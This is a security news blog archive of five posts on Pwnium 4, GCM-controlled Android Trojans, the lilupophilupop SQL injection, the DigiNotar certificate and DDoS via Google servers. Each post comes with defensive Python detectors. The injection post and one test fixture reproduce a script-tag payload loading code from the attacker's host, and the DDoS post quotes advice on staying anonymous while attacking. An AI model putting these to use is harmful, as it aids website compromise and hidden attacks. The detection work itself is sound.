Category: Google Hacking

Jan 26 2014

Google Pwnium 4 Invites Hackers to Attack Chrome OS at CanSecWest

Google holds regular competitions to encourage outside researchers to improve the security of the Chromium project. Contests like Pwnium surface working exploits against specific components, which can then be patched to make Chromium even more secure.

This year Pwnium 4 will once again set sights on Chrome OS, and will be hosted in March at the CanSecWest security conference in Vancouver.

With a total of $2.71828 Million USD in the pot, Pwnium rewards will be issued for eligible Chrome OS exploits at the following levels:

— $110,000 USD: browser or system-level compromise in guest mode or as a logged-in user, delivered via a web page.
— $150,000 USD: compromise with device persistence: guest to guest with interim reboot, delivered via a web page.

Past Pwnium competitions have focused on Intel-based Chrome OS devices, but this year researchers can choose between an ARM-based Chromebook, the HP Chromebook 11 (WiFi), or the Acer C720 Chromebook (2GB WiFi) that is based on the Intel Haswell microarchitecture. The attack must be demonstrated against one of these devices running the then-current stable version of Chrome OS.

Participants need to register in advance for a timeslot. To register, e-mail pwnium4@chromium.org. Registration will close at 5:00 p.m. PST Monday, March 10th, 2014. Only exploits demonstrated on time in this specifically-arranged window will be eligible for a reward.

More Info:
The Chromium Blog : Announcing Pwnium 4 Targeting Chrome OS
Pwnium4@CanSecWest2014 : Official Rules
Chromium OS : Developer Guide

Aug 14 2013

Android Malware Exploiting Google Cloud Messaging Service

Researchers have discovered that a number of malicious Android apps are using Google's Cloud Messaging (GCM) service as a command-and-control channel to carry out attacks.

A post on Securelist today by Kaspersky Lab's Roman Unuchek breaks down five Trojans that have been spotted checking in with GCM after launching.

  • Trojan-SMS.AndroidOS.FakeInst.a
  • Trojan-SMS.AndroidOS.Agent.ao
  • Trojan-SMS.AndroidOS.OpFake.a
  • Backdoor.AndroidOS.Maxit.a
  • Trojan-SMS.AndroidOS.Agent.az

These Trojans have a relatively wide range of functions:

— Sending premium text messages to a specified number
— Sending text messages to a specified number on the contact list
— Performing self-updates
— Stealing text messages
— Deleting incoming text messages that meet criteria set by the C&C
— Stealing contacts
— Replacing the C&C or GCM numbers
— Stopping or restarting its operations
— Generating shortcuts to malicious sites
— Initiating phone calls
— Collecting information about the phone and the SIM card and uploading it to the server

Kaspersky Lab has detected millions of installers for these Trojans in over 130 countries, and Kaspersky Mobile Security (KMS) blocked the attempted installations.

No doubt GCM is a useful service for legitimate software developers, but malware authors are now using Google Cloud Messaging as an additional C&C channel for their Trojans. Worse, commands pushed through GCM are delivered by the GCM system component itself, so they cannot be blocked directly on an infected device.

The only way to cut this channel off from malware authors is for Google to block the developer accounts whose IDs are linked to the registration of malicious programs.
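
Because the push channel itself cannot be blocked on the device, the practical place to catch this family is at the app level, before installation or during triage. The following is an added example, not Kaspersky's code: it reads a decoded AndroidManifest.xml (as produced by a tool such as apktool; APKs ship the manifest as binary XML) and flags an app that both registers a GCM receiver and holds the SMS, contacts and call permissions that the capabilities above require. The package name, receiver name and manifest contents are a constructed sample, not taken from any of the named Trojans.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Strings every GCM client must declare (from Google's GCM client docs):
# the receive permission and the intent action its BroadcastReceiver handles.
GCM_PERMISSION = "com.google.android.c2dm.permission.RECEIVE"
GCM_RECEIVE_ACTION = "com.google.android.c2dm.intent.RECEIVE"

# Permissions that map onto the Trojan capabilities listed above.
RISKY_PERMISSIONS = {
    "android.permission.SEND_SMS": "send (premium) SMS",
    "android.permission.RECEIVE_SMS": "intercept/delete incoming SMS",
    "android.permission.READ_SMS": "steal SMS",
    "android.permission.READ_CONTACTS": "steal contacts",
    "android.permission.CALL_PHONE": "initiate calls",
    "android.permission.READ_PHONE_STATE": "collect phone/SIM info",
}

# Constructed sample manifest (hypothetical package name), not from any real sample.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeinstaller">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE"/>
    <application android:label="Installer">
        <receiver android:name=".PushReceiver"
                  android:permission="com.google.android.c2dm.permission.SEND">
            <intent-filter>
                <action android:name="com.google.android.c2dm.intent.RECEIVE"/>
                <category android:name="com.example.fakeinstaller"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""


def analyze_manifest(xml_text):
    """Return a triage record for one decoded AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}

    # A GCM client registers a receiver whose intent-filter listens for the
    # c2dm RECEIVE action; that receiver is the entry point for pushed commands.
    gcm_receivers = []
    for rcv in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in rcv.iter("action")}
        if GCM_RECEIVE_ACTION in actions:
            gcm_receivers.append(rcv.get(ANDROID_NS + "name"))

    uses_gcm = bool(gcm_receivers) and GCM_PERMISSION in perms
    capabilities = {p: RISKY_PERMISSIONS[p] for p in perms if p in RISKY_PERMISSIONS}
    return {
        "package": root.get("package"),
        "uses_gcm": uses_gcm,
        "gcm_receivers": gcm_receivers,
        "capabilities": capabilities,
        # Push-driven C&C combined with SMS/contacts/call access is the pattern to review.
        "suspicious": uses_gcm and bool(capabilities),
    }


if __name__ == "__main__":
    report = analyze_manifest(SAMPLE_MANIFEST)
    for key, value in report.items():
        print(f"{key}: {value}")
```

A GCM receiver on its own is normal for any app with push notifications; the heuristic only fires when it sits next to the permissions the behaviours above need, so legitimate push-enabled apps without SMS or contact access are not flagged.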

Jan 01 2012

Lilupophilupop SQL Injection Tops 1 Million Infected Pages

A SQL injection attack uncovered by the ISC (Internet Storm Center) is spreading extremely fast: the number of infected pages has risen from just a few hundred to over 1 million in a matter of weeks.

From the past few weeks of reviewing submitted results and information from users, ISC has put together some interesting data. The attack appears to target Windows-based servers, and the logs show the attackers probing the sites in the weeks before they were injected with the following string:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

They have also put together a fairly solid set of statistics on infected pages by TLD (as shown below):

  • UK – 56,300
  • NL – 123,000
  • DE – 49,700
  • FR – 68,100
  • DK – 31,000
  • CN – 505
  • CA – 16,600
  • COM – 30,500
  • RU – 32,000
  • JP – 23,200
  • ORG – 2,690

At the moment it looks like the campaign is partially automated and partially manual. The manual component and the number of sites infected suggest either a reasonably sized workforce or a long preparation period.

If you want to find out whether you have a problem, search Google for "<script src="http://lilupophilupop.com/" and add the site: operator to narrow the results to your domain.

Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM
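
The Google search above only shows what Google has already indexed. The following is an added example, not ISC's code, for checking pages you already hold (crawl output, a saved copy of the site, or database rows rendered to HTML) directly: it collects every <script src> in a page, keeps the ones pointing off-site, and reports those on the lilupophilupop.com indicator. The two HTML pages and the host names are constructed samples; the infected one shows the injected string landing inside a <title> filled from a database column, which is why the string begins by closing the title tag.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator from the ISC diary: script injected from this host.
IOC_HOSTS = {"lilupophilupop.com"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src of every <script> start tag, wherever it lands in the page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def external_scripts(html, own_host):
    """Absolute script sources whose host differs from the site's own host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    found = []
    for src in collector.srcs:
        host = urlparse(src).hostname  # None for relative paths such as /js/app.js
        if host and host.lower() != own_host.lower():
            found.append(src)
    return found


def scan_page(html, own_host):
    """Return the external script sources that match the IOC host list."""
    hits = []
    for src in external_scripts(html, own_host):
        host = urlparse(src).hostname.lower()
        if host in IOC_HOSTS or any(host.endswith("." + h) for h in IOC_HOSTS):
            hits.append(src)
    return hits


# Constructed sample: the <title> text comes from a database column that
# received the injected string, so the title is closed early and the
# attacker's script tag ends up in the <head>.
INFECTED_PAGE = (
    '<html><head><title>Acme Widgets"></title>'
    '<script src="http://lilupophilupop.com/sl.php"></script></title>'
    '<script src="/js/app.js"></script></head><body>hi</body></html>'
)

# Constructed sample: clean page with a legitimate third-party script.
CLEAN_PAGE = (
    '<html><head><title>Acme Widgets</title>'
    '<script src="https://cdn.example.net/jquery.js"></script>'
    '<script src="https://www.example.com/js/app.js"></script></head>'
    '<body>hi</body></html>'
)

if __name__ == "__main__":
    print("infected:", scan_page(INFECTED_PAGE, "www.example.com"))
    print("clean:", scan_page(CLEAN_PAGE, "www.example.com"))
```

Checking the rendered pages only tells you which fields are tainted; since the string was written into the database, the clean-up has to happen in the affected columns, and the injection path (the probing ISC saw in the logs) has to be closed, or the pages will be re-infected.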

Aug 30 2011

Hackers Acquire Google Certificate, Could Hijack Gmail Accounts

Hackers have obtained a digital certificate good for any Google website from a Dutch certificate provider.

Criminals could use the certificate to conduct “man-in-the-middle” attacks targeting users of Gmail, Google’s search engine or any other service.

An attacker who can poison DNS could redirect users to a site of their own, present it with the fraudulently issued certificate, and, since browsers would accept the certificate, collect the users' credentials.

Man-in-the-middle attacks could also be launched via spam messages with links leading to a site posing as, say, the real Gmail. If recipients surfed to that link, their account login username and password could be hijacked.

Details of the certificate were posted on Pastebin last Saturday.

The SSL certificate is valid, and was issued by DigiNotar, a Dutch certificate authority, or CA.

It’s unclear whether the certificate was obtained because of a lack of oversight by DigiNotar or through a breach of the company’s certificate issuing website.

Given DigiNotar's ties to the government and financial sectors, it is extremely important to establish the scope of the breach as quickly as possible. The situation is reminiscent of a breach last March, when a hacker obtained certificates for some of the Web's biggest sites, including Google and Gmail, Microsoft, Skype and Yahoo.

At the time, Comodo said that nine certificates had been fraudulently issued after attackers used an account assigned to a company partner in southern Europe.

Initially, Comodo argued that Iran’s government may have been involved in the theft. Days later, however, a solo Iranian hacker claimed responsibility for stealing the SSL certificates.

Aug 29 2011

Using Google Servers as a DDoS Tool

Google’s servers can be used by cyber attackers to launch DDoS attacks, claims Simone “R00T_ATI” Quatrini, a penetration tester for Italian security consulting firm AIR Sicurezza.

Quatrini discovered that two vulnerable endpoints, /_/sharebox/linkpreview/ and gadgets/proxy?, can be made to request any file type, which Google+ will then download and display, even if the requester isn't logged into Google+.

By making many such requests simultaneously, using a shell script he wrote, he effectively used Google's bandwidth to run a small DDoS attack against a server he owns.

He points out that his home bandwidth can’t exceed 6Mbps, and that the use of Google’s server resulted in an output bandwidth of at least 91Mbps.

“The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs,” says Quatrini. “But beware: igadgets/proxy? will send your IP in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/.”

He says he discovered the flaws that allow the attack on August 10 and contacted Google's Security center about them. After 19 days without a reply from Google, he published his findings.
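
On the receiving end, the attack looks like the quoted remark says: a flood of fetches for the same resource from IP addresses that are not the attacker's. The following is an added example, not Quatrini's script, showing the detection side: it parses Apache combined-format access log lines, tracks requests per (client IP, path) in a sliding window, and reports sources that exceed a rate. The log lines, IP addresses (documentation ranges) and User-Agent string are constructed for the sample and are not taken from any real capture or from Google's fetchers.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_bursts(lines, window_seconds=10, threshold=20):
    """Return {(ip, path): peak requests in any window} for sources over threshold.

    Lines are assumed to be in time order per source, as an access log is.
    """
    windows = defaultdict(deque)
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        q = windows[key]
        q.append(rec["ts"])
        # Drop timestamps that fell out of the window ending at this request.
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks


def make_sample_log():
    """Constructed sample: 30 fetches of one large file in 5 seconds, plus normal traffic."""
    stamp = "29/Aug/2011:10:00:%02d +0000"
    fetcher_ua = "Mozilla/5.0 (assumed link-preview fetcher)"  # assumed, not a real UA
    lines = []
    for i in range(30):
        lines.append(
            '203.0.113.7 - - [%s] "GET /files/big.iso HTTP/1.1" 200 734003200 "-" "%s"'
            % (stamp % (i // 6), fetcher_ua)
        )
    for sec in (1, 30, 59):
        lines.append(
            '198.51.100.5 - - [%s] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"'
            % (stamp % sec)
        )
    return lines


if __name__ == "__main__":
    for (ip, path), peak in find_bursts(make_sample_log()).items():
        print(f"{ip} fetched {path} {peak} times within 10s")
```

Keying on (IP, path) rather than IP alone matters here: a reflected flood through a fetch service repeats one URL, and a shared fetcher IP may also carry legitimate preview requests for other pages. Whether the offending addresses belong to a fetch service has to be confirmed separately, for example against the service's published address ranges.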